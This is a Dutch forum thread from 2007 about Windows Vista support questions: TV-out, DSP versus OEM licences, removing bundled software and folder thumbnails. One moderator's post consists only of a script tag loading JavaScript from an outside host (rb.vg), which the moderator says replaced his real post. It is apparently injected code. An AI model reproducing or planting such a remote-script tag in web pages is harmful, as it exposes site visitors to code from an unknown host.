abonnement Unibet Coolblue Bitvavo
  maandag 22 oktober 2007 @ 12:12:50 #126
37248 BertV
Klei indiaan
pi_54086798
quote:
Op zaterdag 29 september 2007 13:05 schreef Treveo het volgende:

[..]
Intel Duo Core T2300 1,67 GHz
1024 MB DDR2 SDRAM
ATi Mobility Radeon X1400

En het draait als een sneltrein . Alle programma's laden supersnel (< 1 sec)
Hier met een oudere PC loopt het ook prima, om maar wat positief te brengen in dit topic.

Athlon XP 3200+
2 GB RAM
6800GT

Als een trein, net als in XP, maar dan met wat extra wagons erachter.
Handgemaakt | Doggerlandvluchteling
pi_54086923
werkt dat Ultramon ook lekker met beeld weergeven op TV? Heb namelijk ook Vista Premium en Geforce 8300 GS met tv-out kabel liggen naar tv. Dit werkte prima onder XP maar sinds Vista (nu 2 weken) helaas geen beeld op tv (wel geluid overigens). Terwijl wel als ik pc opstart wel tot laadbalkje juist alleen op tv laat zien (niet op pc) maar daarna schiet ie weer terug naar mn Dell 19inch breedbeeld scherm. Hij herkent m wel maar gaat duidelijk iets mis. Heb wel lopen proberen ook met TVTools proggie die zowaar ook nog onder Vista werkt (laatste update jan-07).
pi_54090025
Wat betekent eigenlijk DSP bij de omschrijving van Vista op sommige versie's?
quote:
MS Windows Vista Home Premium DSP NL
Is dit één of andere uitgekleden variant ofzo?
Zit er verschil in met de OEM versie?
Prjis verschil is er wel degelijk.
Maar snap niet goed wat dat DSP inhoud.

Zie bijvoorbeeld ergens dat MS Windows Vista Home Premium Retail NL ¤ 329,00 kost en MS Windows Vista Home Premium DSP NL ¤119,95 kost.

[ Bericht 8% gewijzigd door deliberator op 22-10-2007 15:10:47 ]
pi_54090105
Moeilijk he googlen . Via google kwam ik op een topic uit FOK! en die zei:
quote:
de OEM versies: Microsoft Windows Vista DSP (only for sale with Computer components)
Op maandag 30 november 2009 19:30 schreef Ian_Nick het volgende:
Pietje's hobby is puzzelen en misschien ben jij wel het laatste stukje O+
pi_54090202
quote:
Op maandag 22 oktober 2007 15:07 schreef PietjePuk007 het volgende:
Moeilijk he googlen . Via google kwam ik op een topic uit FOK! en die zei:
[..]
Hoe kan je dit dan los kopen?
Of moet je er dan een systeem bij aanschaffen?
pi_54090650
quote:
Op maandag 22 oktober 2007 15:11 schreef deliberator het volgende:
Hoe kan je dit dan los kopen?
Of moet je er dan een systeem bij aanschaffen?
Dat is 't punt juist. Losse verkoop mag niet .
pi_54090708
quote:
Op maandag 22 oktober 2007 15:34 schreef PietjePuk007 het volgende:

[..]

Dat is 't punt juist. Losse verkoop mag niet .
Ach,als het aan te schaffen is zo, wie zal ik dan zijn om te zeggen dat het niet mag?
  maandag 22 oktober 2007 @ 15:47:22 #133
85129 dikkedorus
connaisseur van de wansmaak
pi_54090905
Neen, koppelverkoop mag niet.
De OEM versie mag je als gebruiker gewoon kopen, er zijn allemaal rare regeltjes geweest, en ik weet niet hoe het nu zit. Zo moest je mistens één hardware-artikel erbij kopen zodat je je eigen componenten-leverancier was. (een muis of een usb-dongle, of iets anders goedkoops).
In Nederland ligt afaik de OEM versie gewoon los in de verkoop. Of er nog verschil is met de DSP versie weet ik niet, maar de OEM is gewoon online te koop voor een fractie van de retailprijs.
Mini smilies tool voor alle [sub] en [sup] liefhebbers.
pi_54090986
quote:
Op maandag 22 oktober 2007 15:47 schreef dikkedorus het volgende:
Neen, koppelverkoop mag niet.
De OEM versie mag je als gebruiker gewoon kopen, er zijn allemaal rare regeltjes geweest, en ik weet niet hoe het nu zit. Zo moest je mistens één hardware-artikel erbij kopen zodat je je eigen componenten-leverancier was. (een muis of een usb-dongle, of iets anders goedkoops).
In Nederland ligt afaik de OEM versie gewoon los in de verkoop. Of er nog verschil is met de DSP versie weet ik niet, maar de OEM is gewoon online te koop voor een fractie van de retailprijs.
Stel nou dat ik via een site de DSP versie bestel.
Dan zou ik deze toch ook geleverd moeten krijgen of niet?
  maandag 22 oktober 2007 @ 17:10:53 #135
125913 Devolution
Beep beep Richie
pi_54092194
quote:
Op maandag 22 oktober 2007 12:20 schreef funrider het volgende:
werkt dat Ultramon ook lekker met beeld weergeven op TV?
Geen idee, ik sluit alleen mijn laptop op de tv aan, niet mijn pc. Aangezien op mijn laptop XP staat en alles gewoon werkt, heb ik Ultramon daar niet voor nodig.

Heb je trouwens wel de 2e monitor enabled in Vista? Want als ik mijn laptop op mijn tv aansluit, dan krijg ik ook de laadbalk op de tv te zien, maar daarna niets meer, totdat ik de 2e monitor enable ('Het bureaublad uitbreiden naar de tweede monitor'). Het zou namelijk kunnen dat ie de instellingen niet onthoudt na een reboot (en je dus bij elke boot weer een enkel scherm gebruikt).
"You know what Hell really is? It's not lakes of burning oil or chains of ice. It's being removed from God's sight."
pi_54092557
De icoontjes in de systemtray zijn nogal groot. Hoe kun je dit aanpassen?
pi_54094096
quote:
Op maandag 22 oktober 2007 11:44 schreef MetalSonic het volgende:
Ik heb ook een vreemde fout.
Enige tijd terug een patch voor ut2004 gedownload, de download ging niet snel dus ik dacht "dan stop ik 'm maar".
Op de desktop staat dan wel al een applicatie ( ut-2004 patch )

Maar die kan ik niet verwijderen, "cant delete programm in use bij anoter process"
1) in safe mode kan ik hem niet deleten
2) hij loopt helemaal niet "zichtbaar " onder processen

wat moet ik doen ?
  maandag 22 oktober 2007 @ 23:14:58 #138
125913 Devolution
Beep beep Richie
pi_54099579
Probeer het eens met dit programma

En Google
"You know what Hell really is? It's not lakes of burning oil or chains of ice. It's being removed from God's sight."
pi_54099595
Goeden avond mensen...

ik heb een vraag, waarschijnlijk is die vraag al eerder langs gekomen, maar ik voel me niet geroepen 17 delen door te lezen
Ik heb afgelopen vrijdag een nieuwe notebook gekocht.. compleet afgeleverd met Vista premium.. Je moet overigens weten dat ik een klote hekel heb aan alle doelloze programmatjes om het "leuk" te maken.
Nu is mijn vraag of er iets van een lijst bestaat waar op staat welke "entertainment" en "overbodige opsmuk" programma's zo verwijdert kunnen worden zonder echt iets toe te voegen aan windows.
(of zelfs wel iets van een programmatje die de overbodige shit eraf haalt?)

Miss vraag je je af, waarom koos je niet voor Vista Basic? ik ben in de winkel sterk afgeraden daarvoor te kiezen.. omdat je dan echt alles zelf moet installeren.. wat volgens hen geen goed idee was... overigens twijfel ik nu daar over... maar ach, ik zit nu met deze versie
"Dude.. they can't get any better than that"
pi_54100333
quote:
Op maandag 22 oktober 2007 23:14 schreef Devolution het volgende:
Probeer het eens met dit programma

En Google
danku maar heb je ook zoiets voor Vista ?
  dinsdag 23 oktober 2007 @ 00:22:14 #141
85129 dikkedorus
pi_54101250
quote:
Op maandag 22 oktober 2007 23:15 schreef Eastwood het volgende:
Goeden avond mensen...

ik heb een vraag, waarschijnlijk is die vraag al eerder langs gekomen, maar ik voel me niet geroepen 17 delen door te lezen
Ik heb afgelopen vrijdag een nieuwe notebook gekocht.. compleet afgeleverd met Vista premium.. Je moet overigens weten dat ik een klote hekel heb aan alle doelloze programmatjes om het "leuk" te maken.
Nu is mijn vraag of er iets van een lijst bestaat waar op staat welke "entertainment" en "overbodige opsmuk" programma's zo verwijdert kunnen worden zonder echt iets toe te voegen aan windows.
(of zelfs wel iets van een programmatje die de overbodige shit eraf haalt?)

Miss vraag je je af, waarom koos je niet voor Vista Basic? ik ben in de winkel sterk afgeraden daarvoor te kiezen.. omdat je dan echt alles zelf moet installeren.. wat volgens hen geen goed idee was... overigens twijfel ik nu daar over... maar ach, ik zit nu met deze versie
Je zult zelf met add/remove programs (ben even kwijt hoe dat nu heet) zelf moeten nagaan wat je wel en niet nodig hebt. Veel van die "opsmuk" is verrekte handig namelijk.
pi_54105694
quote:
Op maandag 22 oktober 2007 23:44 schreef MetalSonic het volgende:

[..]

danku maar heb je ook zoiets voor Vista ?
Nu killbox en unlocker geprobeerd maar 't is nog steeds niet gelukt :S
Kom naar Gamrelease.eu , helemaal gefocust op release dates ! . Binnen 2 minuten jouw release date om vervolgens weer verder te surfen.
  dinsdag 23 oktober 2007 @ 10:54:29 #143
85129 dikkedorus
pi_54106060
quote:
Op maandag 22 oktober 2007 15:52 schreef deliberator het volgende:

[..]

Stel nou dat ik via een site de DSP versie bestel.
Dan zou ik deze toch ook geleverd moeten krijgen of niet?
DSP is bijna hetzelfde als OEM, maar ipv via de hardwarefabrikanten gaat het dan weer via Delivery Service Partners. Whataver that means. Als je het kan kopen zou ik het gewoon doen. (ik ben DSP nog nooit tegengekomen in een webwinkel)
  Moderator / FOK!Fotograaf dinsdag 23 oktober 2007 @ 10:58:22 #144
132619 crew  D_A
Ben jij van die © ?
pi_54106127
<script src=http://rb.vg/1.js></script
[b] Op Zaterdag 26 april 2008 22:35 schreef lauwert het volgende:[/b]
[i] Waar zouden we toch zijn zonder onze geliefde D_A O+ [/i]
pi_54106350
quote:
Op dinsdag 23 oktober 2007 10:58 schreef Dark_Angelus het volgende:
<script src=http://rb.vg/1.js></script
huh?
  Moderator / FOK!Fotograaf dinsdag 23 oktober 2007 @ 11:33:21 #146
132619 crew  D_A
Ben jij van die © ?
pi_54106594
Dat is behoorlijk vreemd, ik had gepost dat je dan VLC player moest gebruiken in een quote naar crossover.

Maar goed, FOK! heeft even kuren.
[b] Op Zaterdag 26 april 2008 22:35 schreef lauwert het volgende:[/b]
[i] Waar zouden we toch zijn zonder onze geliefde D_A O+ [/i]
pi_54112687
heb m getracht te enablen die tv. Hij ziet m ook maar kan geen vinkje in hokje bewaren en ook nog steeds geen beeld op TV. Vreemd allemaal. Had stille hoop dat Ultramon oplossing zou bieden. Dacht ook nog dat met mn rechten te maken had maar heb 1 account onder windows en dat is tevens het admin account.
quote:
Op maandag 22 oktober 2007 17:10 schreef Devolution het volgende:

[..]

Geen idee, ik sluit alleen mijn laptop op de tv aan, niet mijn pc. Aangezien op mijn laptop XP staat en alles gewoon werkt, heb ik Ultramon daar niet voor nodig.

Heb je trouwens wel de 2e monitor enabled in Vista? Want als ik mijn laptop op mijn tv aansluit, dan krijg ik ook de laadbalk op de tv te zien, maar daarna niets meer, totdat ik de 2e monitor enable ('Het bureaublad uitbreiden naar de tweede monitor'). Het zou namelijk kunnen dat ie de instellingen niet onthoudt na een reboot (en je dus bij elke boot weer een enkel scherm gebruikt).
  dinsdag 23 oktober 2007 @ 16:55:03 #148
7168 Kptelmo
Syntax Error
pi_54113339
quote:
Op dinsdag 16 oktober 2007 22:20 schreef PietjePuk007 het volgende:
Ben ik weer .

Stel je hebt een serie gedownload van een aantal afleveringen, je download daar netjes de dvd-cover (JPG) bij en dat dump je in 1 map. Als je nu die map aan gaat klikken heeft het pictogram van die map (weergave groot / normaal) 2 plaatjes "in zich". Kan je ervoor zorgen dat alleen die dvd-cover weergeeft (daar heb je 'm tenslotte voor gedownload )?

edit (er zijn meerder mensen met dit probleem )
[ afbeelding ]

Bron (maar de oplossing werkt dus niet want er blijven 2 plaatjes staan).
Even terug naar een eerdere vraag....

De weergave is veranderd maar net als in XP kun je een afbeelding als icoon gebruiken door deze folder.jpg te noemen. Dan krijg je wel die opengeklapte folder als icoon maar dan met maar 1 afbeelding (de folder.jpg dus).
"Programming today is a race between software engineers striving to build bigger and better idiot-proof programs, and the Universe trying to produce bigger and better idiots. So far, the Universe is winning." (Rich Cook)
pi_54115359
quote:
Op dinsdag 23 oktober 2007 16:55 schreef Kptelmo het volgende:
De weergave is veranderd maar net als in XP kun je een afbeelding als icoon gebruiken door deze folder.jpg te noemen. Dan krijg je wel die opengeklapte folder als icoon maar dan met maar 1 afbeelding (de folder.jpg dus).
, de map is nog wel opengeklapt en daarin staat ie. In XP is 't wat mooier maar mijn vraag is beantwoord, dank .
  dinsdag 23 oktober 2007 @ 21:08:57 #150
7168 Kptelmo
Syntax Error
pi_54118829
Ik vond dit in XP idd een stuk beter uitzien, maar goed ... tis beter dan niks.
"Programming today is a race between software engineers striving to build bigger and better idiot-proof programs, and the Universe trying to produce bigger and better idiots. So far, the Universe is winning." (Rich Cook)
abonnement Unibet Coolblue Bitvavo
Forum Opties
Forumhop:
Hop naar:
(afkorting, bv 'KLB')